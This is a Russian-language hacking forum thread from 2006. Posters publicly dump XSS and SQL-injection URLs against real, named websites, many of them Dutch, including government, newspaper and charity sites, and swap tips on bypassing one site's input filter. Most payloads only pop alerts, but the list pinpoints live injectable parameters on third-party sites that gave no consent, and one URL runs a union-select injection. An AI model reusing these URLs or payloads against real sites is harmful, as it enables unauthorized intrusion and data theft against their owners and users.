Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Ещё немного Xss и прочего. |
09.01.2006, 18:01
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
Ещё немного Xss и прочего.
Завалялось вот у меня немного барахлишка. Выкладываю чтобы не пропало. =))
Код HTML:
http://vacaturekrant.nl/werkgever/bestel.fpl?action=<img%20src=javascript:alert("test")>
http://www.beatrix.org/html/index.php?pLan=en&pSes=37f2657266d4d5633dc9859a9332cea3&pMn=ifo&pPg=%3Cscript%3Ealert('ok')%3C/script%3E
http://www.hotelbeatrix.nl/index.php?menu_id=1&t_id=-1+union+select+null,USER(),null,null,null,null,null,null,null,null,null/*
http://www.jongbeatrix.nl/jb_nieuws.php?nws_year=<img%20src=javascript:a=/ok/;alert(a.source)>
http://www.ervbeatrix.nl/page.php?PageID='><img%20src=javascript:alert('ok')>
http://www.hilfertsheem.nl/admin/index.php?f=догадайся
http://wwtdd.com/index.php?type=box&p='%3E%3Cscript%3Ealert(/Your%20Bunny%20Wrote/)%3C/script%3E
http://www.qoop.nl/index.php?page=%2Fzoeken.php%3Ftype%253Darticle%2526keyword%253D%253Cscript%253Ealert%2528%252FYour%2BBunny%2BWrote%252F%2529%253C%252Fscript%253E%2526SID%253D
http://www.comicbase.nl/nieuws.php?openmaand=200'412
http://www.foksuk.nl/dag2.php?jaar=2005&week=%3Cscript%3Ealert(/Your%20Bunny%20Wrote/)%3C/script%3E
http://www.kiesmetzorg.nl/index.php?b=27&d=%3Cscript%3Ealert(/Your%20Bunny%20Wrote/)%3C/script%3E
http://www.aup.nl/do.php?a=show_visitor_digitaal&b=downloads&p='%3Cscript%3Ealert(/Your%20Bunny%20Wrote/)%3C/script%3E
http://www.bvlo.be/article/view.web?articleId=5&siteNav=%3Cscript%3Ealert(/Your%20Bunny%20Wrote/)%3C/script%3E
http://www.schildklier.nl/index.php?id=%3Cscript%3Ealert(/Your%20Bunny%20wrote/)%3C/script%3E
http://www.wegcode.be/wetgrp.php?g=%3Cscript%3Ealert(/Your%20Bunny%20Wrote/)%3C/script%3E
http://www.volkskrant.com/verleiding/steden/stad.php?stad='>%3Cscript%3Ealert(/Your%20Bunny%20Wrote/)%3C/script%3E
http://www.vdo.com/DTCO/metanavigation/search_dtco.aspx?cc=NL&coc=NL&search=<img%20src=javascript:a=/ok/;alert(a.source)>
http://www.ecodorp.nl/welkom/index.php?inhoud=<script>alert(/ok/)</script>
http://www.artsenzondergrenzen.nl/index.php?pid=6'%3Cscript%3Ealert(/Hack%20me!/)%3C/script%3E&article=
http://www.burojansen.nl/nieuwsbrief_jaar.php?jaar=<script>alert(/antichat/)</script>
http://www.balkenende-stop.nl/?zone=%3Cscript%3Ealert(/Your%20Bunny%20Wrote/)%3C/script%3E
http://en.thinkexist.com/search/searchquotation.asp?search=%3Cscript%3Ealert%28%2Fgo%21%2F%29%3C%2Fscript%3E
http://www.cafepress.com/cp/search/search.aspx?source=searchBox&q=%3Cscript%3Ealert%28%2Fcccp%2F%29%3C%2Fscript%3E&cfpt2=&copt=&cfpt=&x=0&y=0
http://www.highbeam.com/library/search.asp?ctrlInfo=Round18%3AMode18c%3ASR%3ASearch&FN=SS&search_newspapers=on&search_magazines=on&search_books=on&search_transcripts=on&search_maps=on&search_images=on&search_encyclopedias=on&search_dictionaries=on&search_almanacs=on&q=%3Cscript%3Ealert%28%2Fantichat.ru%2F%29%3C%2Fscript%3E&submit.x=30&submit.y=6&submit=submit
Последний раз редактировалось Azazel; 10.01.2006 в 01:39..
|
|
|
09.01.2006, 22:33
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
XSS На сайте правительства Нидерландов _http://www.regering.nl/sys/zoeken.jsp В поле поиск <body onLoad=alert('ok')>
_http://www.government.nl/print.jsp?start_comment=print-start&end_comment=print-end&url=%3Cscript%3Ealert(/cccp/)%3C/script%3E
Последний раз редактировалось Azazel; 10.01.2006 в 00:51..
|
|
|
|
14.01.2006, 17:12
|
|
Новичок
Регистрация: 28.12.2005
Сообщений: 27
Провел на форуме:
167272
Репутация:
2
|
|
|
|
|
|
14.01.2006, 17:28
|
|
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281
Репутация:
23
|
|
http://www.oxiris.com/
П строке поиска . <script>alert ('xss')</script> не вы шло ,
но <table border=200><tr><td>dasd</td></tr> , прикольно получилось .
|
|
|
|
14.01.2006, 17:31
|
|
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281
Репутация:
23
|
|
Последний раз редактировалось Vandal; 14.01.2006 в 19:35..
|
|
|
|
14.01.2006, 19:25
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903
Репутация:
345
|
|
Если другие теги пропускает, то можно <img src=javascript:alert()>
|
|
|
|
14.01.2006, 19:36
|
|
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281
Репутация:
23
|
|
Сообщение от max_pain89
Если другие теги пропускает, то можно <img src=javascript:alert()>
Все равно 0 .
|
|
|
|
14.01.2006, 19:39
|
|
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме:
2333839
Репутация:
212
|
|
|
|
|
|
14.01.2006, 19:41
|
|
Участник форума
Регистрация: 11.03.2005
Сообщений: 269
Провел на форуме:
1024281
Репутация:
23
|
|
Как то все странно , у меня в ие и опере не работает .
_______
alert () работает alert('xss') не работатет
|
|
|
|
14.01.2006, 19:52
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903
Репутация:
345
|
|
если ты про _http://www.oxiris.com/ там сойдет <img src=vbscript:alert()> исключительно для алерта...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
